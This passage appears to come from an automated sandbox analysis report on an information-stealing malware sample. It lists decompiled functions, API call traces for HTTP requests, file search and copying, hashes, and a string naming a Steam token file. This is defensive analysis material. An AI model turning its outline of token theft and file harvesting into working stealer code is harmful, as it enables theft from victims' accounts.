                                                                                          • Process32Next.KERNEL32(?,00000128), ref: 0041037C
                                                                                          • CloseHandle.KERNEL32(?,?,00000000), ref: 00410389
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Process32$CloseCreateFirstH_prologHandleNextSnapshotToolhelp32lstrcpy
                                                                                          • String ID:
                                                                                          • API String ID: 599723951-0
                                                                                          • Opcode ID: 2fc1f2962bdb036bcc7fb993ace66804accd746089eb9d5784e12931c34da8f2
                                                                                          • Instruction ID: a4a97019f206722b2e8740589aebd7bc91867f573d1150960a86d602fc248a9b
                                                                                          • Opcode Fuzzy Hash: 2fc1f2962bdb036bcc7fb993ace66804accd746089eb9d5784e12931c34da8f2
                                                                                          • Instruction Fuzzy Hash: 23210CB1A00118EBCB10EFA5CD55AEEBBB9AF58348F50407EE405F3691CB785A488B65
                                                                                          Function 004024D7 Relevance: 7.5, APIs: 5, Instructions: 39memorystringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 004024F0
                                                                                            • Part of subcall function 0040245C: memset.MSVCRT ref: 00402481
                                                                                            • Part of subcall function 0040245C: CryptStringToBinaryA.CRYPT32(00000104,00000000,00000001,00000000,?,00000000,00000000), ref: 004024A7
                                                                                            • Part of subcall function 0040245C: CryptStringToBinaryA.CRYPT32(00000104,00000000,00000001,?,?,00000000,00000000), ref: 004024C1
                                                                                          • strcat.MSVCRT(?,00000000,?,?,00000000,00000104), ref: 00402505
                                                                                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00402510
                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 00402517
                                                                                            • Part of subcall function 00402308: ??_U@YAPAXI@Z.MSVCRT ref: 0040238D
                                                                                          • memset.MSVCRT ref: 00402540
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: memset$BinaryCryptHeapString$AllocateProcessstrcat
                                                                                          • String ID:
                                                                                          • API String ID: 3248666761-0
                                                                                          • Opcode ID: a641902682074bfb60fea3bc3b21c2ff598bd00ccde1354f0615c18b64d23653
                                                                                          • Instruction ID: 5936fd312f401cb4099e43ed518250dd8d8a99da873d70e406837ce1c28814d2
                                                                                          • Opcode Fuzzy Hash: a641902682074bfb60fea3bc3b21c2ff598bd00ccde1354f0615c18b64d23653
                                                                                          • Instruction Fuzzy Hash: BCF044B6C0021CB7CB10BBA4DD49FCA777C9F14304F0000A6BA45F2081DAB497C4CBA4
                                                                                          Function 00413326 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 94stringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _EH_prolog.MSVCRT ref: 0041332B
                                                                                          • lstrlenA.KERNEL32(00000000), ref: 00413348
                                                                                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041340C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: H_prologlstrlen
                                                                                          • String ID: ERROR
                                                                                          • API String ID: 2133942097-2861137601
                                                                                          • Opcode ID: 457c7dca167f6097eb3decf56045153080dc014ab3c7bbf54f3f61cdd9435eba
                                                                                          • Instruction ID: 77545b96f9c55e0de6ec71263cb7e0cfa71b0ad252d2fb84a837ede919fdf13f
                                                                                          • Opcode Fuzzy Hash: 457c7dca167f6097eb3decf56045153080dc014ab3c7bbf54f3f61cdd9435eba
                                                                                          • Instruction Fuzzy Hash: 133172B1900148AFCB00EFA9D956BDD7FB4AB15304F10803EF405A7282DB389648CBA9
                                                                                          Function 0041303A Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _EH_prolog.MSVCRT ref: 0041303F
                                                                                            • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                            • Part of subcall function 00404F2A: _EH_prolog.MSVCRT ref: 00404F2F
                                                                                            • Part of subcall function 00404F2A: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404F92
                                                                                            • Part of subcall function 00404F2A: StrCmpCA.SHLWAPI(?), ref: 00404FA6
                                                                                            • Part of subcall function 00404F2A: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404FC9
                                                                                            • Part of subcall function 00404F2A: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00404FFF
                                                                                            • Part of subcall function 00404F2A: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405023
                                                                                            • Part of subcall function 00404F2A: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040502E
                                                                                            • Part of subcall function 00404F2A: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 0040504C
                                                                                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0041309D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: HttpInternet$H_prologOpenRequest$ConnectInfoOptionQuerySendlstrcpy
                                                                                          • String ID: ERROR$ERROR
                                                                                          • API String ID: 1120091252-2579291623
                                                                                          • Opcode ID: aefbf7741ce3e4e0e52d37c23a8d594d106d3e01a68b0f1fcaa8373cdeccc4c0
                                                                                          • Instruction ID: 9cf05e6fcab295474e65acada3454b7dde9d8d835f49f967da0029279a9dc82d
                                                                                          • Opcode Fuzzy Hash: aefbf7741ce3e4e0e52d37c23a8d594d106d3e01a68b0f1fcaa8373cdeccc4c0
                                                                                          • Instruction Fuzzy Hash: FC210EB0900189EADB14FFA5C556BDDBBF4AF18348F50417EE80563682DB785B0CCB66
                                                                                          Function 00411001 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • OpenProcess.KERNEL32(00000410,00000000,2IA), ref: 00411019
                                                                                          • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00411034
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0041103B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseFileHandleModuleNameOpenProcess
                                                                                          • String ID: 2IA
                                                                                          • API String ID: 3183270410-4174278054
                                                                                          • Opcode ID: 30d4ffeda736fd64e0374663d8f4d70df638ccef9048597482ecb454b1010210
                                                                                          • Instruction ID: 8552e384592846dc61b773d54a0908cfb1ecd9fdbc452b9aa5e823a114c6ff4c
                                                                                          • Opcode Fuzzy Hash: 30d4ffeda736fd64e0374663d8f4d70df638ccef9048597482ecb454b1010210
                                                                                          • Instruction Fuzzy Hash: 85F03079905228BBEB60AB90DC49FDD3B78AB09715F000061BE85A61D0DBB4AAC4CBD4
                                                                                          Function 00414437 Relevance: 6.1, APIs: 4, Instructions: 76sleepsynchronizationthreadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _EH_prolog.MSVCRT ref: 0041443C
                                                                                            • Part of subcall function 00413460: _EH_prolog.MSVCRT ref: 00413465
                                                                                          • Sleep.KERNEL32(000003E8,?,?,?,?,?,00000000), ref: 004144C0
                                                                                          • CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                          • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: H_prolog$CreateObjectSingleSleepThreadWait
                                                                                          • String ID:
                                                                                          • API String ID: 2678630583-0
                                                                                          • Opcode ID: fb7f86a4d038d58da3621eb36abdba5b43a6fdb478c7a05049313af6d209da56
                                                                                          • Instruction ID: 90c6c212f9a98d1f3efa3e19a0f967dde8f702bf728512cfd2e6caf086527d46
                                                                                          • Opcode Fuzzy Hash: fb7f86a4d038d58da3621eb36abdba5b43a6fdb478c7a05049313af6d209da56
                                                                                          • Instruction Fuzzy Hash: 3E311E75900148AFCB11DFA4C995ADEBBB8FF18304F50412FF906A7281DB789B88CB95
                                                                                          Function 00402308 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 116COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 6%@$6%@
                                                                                          • API String ID: 0-3369382886
                                                                                          • Opcode ID: 1671fecbb1ebbe02e7eb2cc7cf41ad1b7ad139c209bd50c1cd2ae32b560b646f
                                                                                          • Instruction ID: badd9bf96c2c88f43ed760c6ea304aae97d5f1f2e5982ea7d2ae84e0ed7fb19c
                                                                                          • Opcode Fuzzy Hash: 1671fecbb1ebbe02e7eb2cc7cf41ad1b7ad139c209bd50c1cd2ae32b560b646f
                                                                                          • Instruction Fuzzy Hash: 9C4146716001199FCB01CF69D8806EDBBB1FF89318F1484BADC55EB395C3B8A982CB54
                                                                                          Function 00414538 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58stringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _EH_prolog.MSVCRT ref: 0041453D
                                                                                            • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                            • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                            • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                            • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                            • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                            • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                          • lstrlenA.KERNEL32(00000000,00000000,?,00000000,0042655B), ref: 0041458E
                                                                                            • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                            • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                                            • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                            • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                            • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                          Strings
                                                                                          • Soft\Steam\steam_tokens.txt, xrefs: 004145A6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: H_prolog$lstrcpy$lstrlen$CreateObjectSingleThreadWaitlstrcat
                                                                                          • String ID: Soft\Steam\steam_tokens.txt
                                                                                          • API String ID: 40794102-3507145866
                                                                                          • Opcode ID: 5dea421be7ed3263a5a25ba242280bcfb85689912c92a282fb01fad9efacc230
                                                                                          • Instruction ID: 1e33fb55044e108cdc823b8717a6e4474b59c1838e8e2ba6a3b9a54ee3721495
                                                                                          • Opcode Fuzzy Hash: 5dea421be7ed3263a5a25ba242280bcfb85689912c92a282fb01fad9efacc230
                                                                                          • Instruction Fuzzy Hash: 61215B71C00148AACB14FBE5C966BDDBB74AF18308F50817EE411725D2DB78174CCA66
                                                                                          Function 004071C6 Relevance: 4.7, APIs: 3, Instructions: 231stringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _EH_prolog.MSVCRT ref: 004071CB
                                                                                            • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                          • lstrlenA.KERNEL32(00000000), ref: 00407402
                                                                                          • lstrlenA.KERNEL32(00000000), ref: 00407416
                                                                                            • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                            • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                            • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                            • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                            • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                            • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                            • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                            • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                            • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                            • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                            • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                                            • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                            • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                            • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: H_prolog$lstrcpy$lstrlen$lstrcat$CreateObjectSingleThreadWait
                                                                                          • String ID:
                                                                                          • API String ID: 3193997572-0
                                                                                          • Opcode ID: 9c7e708cd882b152c105328016b18edc6413fade68d22c0f532ea058ca18a39d
                                                                                          • Instruction ID: 126ac542581dd9a9e00b668703c25f94ef807883601db8bc0808eb5b6dcb11bd
                                                                                          • Opcode Fuzzy Hash: 9c7e708cd882b152c105328016b18edc6413fade68d22c0f532ea058ca18a39d
                                                                                          • Instruction Fuzzy Hash: 12A14D71904248EADB15EBE4D955BEDBBB4AF18308F5040BEE406735D2DB782B0CDB26
                                                                                          Function 004165D9 Relevance: 4.6, APIs: 3, Instructions: 120stringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _EH_prolog.MSVCRT ref: 004165DE
                                                                                            • Part of subcall function 00410D21: SHGetFolderPathA.SHELL32(00000000,;\B,00000000,00000000,?), ref: 00410D52
                                                                                          • lstrcat.KERNEL32(?,00000000), ref: 00416620
                                                                                          • lstrcat.KERNEL32(?), ref: 0041663F
                                                                                            • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                            • Part of subcall function 004162AF: _EH_prolog.MSVCRT ref: 004162B4
                                                                                            • Part of subcall function 004162AF: wsprintfA.USER32 ref: 004162D4
                                                                                            • Part of subcall function 004162AF: FindFirstFileA.KERNEL32(?,?), ref: 004162EB
                                                                                            • Part of subcall function 004162AF: StrCmpCA.SHLWAPI(?,004268B0), ref: 00416308
                                                                                            • Part of subcall function 004162AF: StrCmpCA.SHLWAPI(?,004268B4), ref: 00416322
                                                                                            • Part of subcall function 004162AF: wsprintfA.USER32 ref: 00416346
                                                                                            • Part of subcall function 004162AF: StrCmpCA.SHLWAPI(?,00426525), ref: 00416357
                                                                                            • Part of subcall function 004162AF: wsprintfA.USER32 ref: 00416374
                                                                                            • Part of subcall function 004162AF: PathMatchSpecA.SHLWAPI(?,?), ref: 0041639B
                                                                                            • Part of subcall function 004162AF: lstrcat.KERNEL32(?,?), ref: 004163C7
                                                                                            • Part of subcall function 004162AF: lstrcat.KERNEL32(?,004268CC), ref: 004163D9
                                                                                            • Part of subcall function 004162AF: lstrcat.KERNEL32(?,?), ref: 004163E9
                                                                                            • Part of subcall function 004162AF: lstrcat.KERNEL32(?,004268D0), ref: 004163FB
                                                                                            • Part of subcall function 004162AF: lstrcat.KERNEL32(?,?), ref: 0041640F
                                                                                            • Part of subcall function 004162AF: wsprintfA.USER32 ref: 00416388
                                                                                            • Part of subcall function 004162AF: CopyFileA.KERNEL32(?,00000000,00000001), ref: 004164DD
                                                                                            • Part of subcall function 004162AF: DeleteFileA.KERNEL32(00000000), ref: 0041655B
                                                                                            • Part of subcall function 004162AF: FindNextFileA.KERNEL32(00000000,?), ref: 004165AA
                                                                                            • Part of subcall function 004162AF: FindClose.KERNEL32(00000000), ref: 004165B9
                                                                                            • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
